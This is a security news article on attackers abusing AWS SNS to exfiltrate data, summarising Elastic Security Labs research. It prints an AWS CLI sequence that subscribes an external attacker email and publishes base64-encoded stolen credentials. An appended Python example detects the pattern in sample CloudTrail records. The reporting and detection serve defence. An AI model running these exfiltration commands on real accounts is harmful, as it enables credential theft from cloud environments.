Amazon Web Services Simple Notification Service (AWS SNS) has emerged as a new vector for malicious actors to exfiltrate sensitive data and conduct phishing campaigns. This pub/sub messaging service, designed to enable application-to-person and application-to-application communications, is increasingly being exploited by attackers seeking to bypass traditional security controls and [network monitoring](https://cybersecuritynews.com/cisa-releases-guidance-for-network-monitoring/).

The attacks leverage legitimate AWS functionality to create SNS topics, subscribe external email addresses, and publish sensitive data through API calls that appear as normal AWS service usage. This technique effectively bypasses security groups, network ACLs, and other traditional network-based protections because all communication occurs within trusted AWS infrastructure.

Analysts at Elastic Security Labs [identified](https://www.elastic.co/security-labs/aws-sns-abuse) that adversaries with access to EC2 instances can exploit attached IAM roles that have SNS permissions to establish exfiltration channels. Their research demonstrated how attackers can use native AWS CLI commands to create topics and subscribe external email addresses that receive the stolen data.

The exfiltration technique is particularly concerning because it leaves minimal forensic evidence and blends with legitimate traffic. Organizations with permissive IAM policies or monitoring gaps may not detect this activity until after sensitive data has been compromised.

The technical implementation of this attack is straightforward and requires only basic AWS CLI knowledge. After gaining access to an EC2 instance, attackers can execute a series of commands to establish the exfiltration channel:

```bash
# Create SNS topic and capture its ARN
TOPIC_ARN=$(aws sns create-topic --name 'whitebox-sns-topic' --query 'TopicArn' --output text)

# Subscribe external email to the topic
aws sns subscribe --topic-arn "$TOPIC_ARN" --protocol email \
  --notification-endpoint 'adversary@protonmail.com'

# Base64 encode stolen credentials and publish to topic
BASE64_CONTENT=$(base64 /tmp/stolen_creds.txt)
aws sns publish --topic-arn "$TOPIC_ARN" --message "$BASE64_CONTENT" --subject 'Encoded Credentials from EC2'
```

Workflow for data exfiltration via AWS SNS (Source: Elastic)

Detection efforts should focus on CloudTrail logs for unusual SNS API calls, particularly CreateTopic, Subscribe, and Publish actions from EC2 instance roles. Elastic Security Labs provided hunting queries that identify anomalous SNS activity by monitoring for rare user identities creating topics or subscribing with [email](https://cybersecuritynews.com/email-security-gateways/) protocols.

Security teams are advised to implement strict IAM policies following the principle of least privilege and enable comprehensive logging of SNS activities to [mitigate](https://cybersecuritynews.com/ways-to-mitigate-phishing-attacks-a-detailed-guide/) this emerging threat vector.

The post [AWS SNS Abused To Exfiltrate Data & Phishing Attack](https://cybersecuritynews.com/aws-sns-abused/) appeared first on [Cyber Security News](https://cybersecuritynews.com).
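The detection logic the article describes, as an added example that is not part of the original post or of Elastic's hunting queries: it scans CloudTrail-shaped SNS records for the CreateTopic, Subscribe (email protocol) and Publish chain issued by an EC2 instance role. The records, account id, role name, instance id and topic are constructed placeholders, and the example assumes CloudTrail data-event logging for SNS Publish is enabled so that Publish calls appear in the trail.

```python
# Offline detection over constructed CloudTrail records (not real AWS logs).
EMAIL_PROTOCOLS = {"email", "email-json"}    # deliver message bodies to a mailbox
CONTROL_PLANE = {"CreateTopic", "Subscribe"}  # rarely needed by an application role

def _rec(name, identity, params, resp=None):
    """Build a minimal CloudTrail-shaped SNS record (constructed sample data)."""
    return {"eventSource": "sns.amazonaws.com", "eventName": name,
            "userIdentity": identity, "requestParameters": params,
            "responseElements": resp or {}}

# Placeholder account, role, instance and topic names.
EC2_ROLE = {"type": "AssumedRole",
            "arn": "arn:aws:sts::111122223333:assumed-role/ec2-app-role/i-0abc123def456"}
ADMIN = {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/ops-admin"}
TOPIC = "arn:aws:sns:us-east-1:111122223333:whitebox-sns-topic"
SAMPLE_TRAIL = [
    _rec("CreateTopic", EC2_ROLE, {"name": "whitebox-sns-topic"}, {"topicArn": TOPIC}),
    _rec("Subscribe", EC2_ROLE, {"protocol": "email", "endpoint": "someone@example.net",
                                 "topicArn": TOPIC}),
    _rec("Subscribe", ADMIN, {"protocol": "email", "endpoint": "alerts@example.com",
                              "topicArn": "arn:aws:sns:us-east-1:111122223333:ops-alerts"}),
    _rec("Publish", EC2_ROLE, {"topicArn": TOPIC, "subject": "Encoded Credentials from EC2"}),
]

def is_ec2_instance_role(identity):
    """EC2 instance-profile sessions use the instance id (i-...) as the session name."""
    return (identity.get("type") == "AssumedRole"
            and identity.get("arn", "").rsplit("/", 1)[-1].startswith("i-"))

def scan_sns_events(events, trusted_domains):
    """Return one finding (with every matching reason) per suspicious SNS record."""
    findings, tainted_topics = [], set()
    for ev in events:
        if ev.get("eventSource") != "sns.amazonaws.com":
            continue
        name, params, who = ev["eventName"], ev.get("requestParameters", {}), ev.get("userIdentity", {})
        reasons = []
        if name == "Subscribe" and params.get("protocol") in EMAIL_PROTOCOLS:
            domain = params.get("endpoint", "").rsplit("@", 1)[-1].lower()
            if domain not in trusted_domains:
                reasons.append(f"email subscription to untrusted domain '{domain}'")
        if is_ec2_instance_role(who):
            topic = params.get("topicArn") or ev.get("responseElements", {}).get("topicArn")
            if name in CONTROL_PLANE:       # an app role normally only publishes
                reasons.append(f"{name} issued from an EC2 instance role")
                tainted_topics.add(topic)   # remember topics this role set up itself
            elif name == "Publish" and topic in tainted_topics:
                reasons.append("Publish to a topic the instance role itself created/subscribed")
        if reasons:
            findings.append({"event": name, "actor": who.get("arn"), "reasons": reasons})
    return findings
```

Running `scan_sns_events(SAMPLE_TRAIL, {"example.com"})` flags the three instance-role records and leaves the administrator's subscription to a trusted domain alone.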
Related Tags:

- NAICS: 541 – Professional, Scientific, and Technical Services
- NAICS: 518 – Computing Infrastructure Providers, Data Processing, Web Hosting, and Related Services
- NAICS: 51 – Information
- TA0010 – Exfiltration
- Blog: Cybersecurity News
- Phishing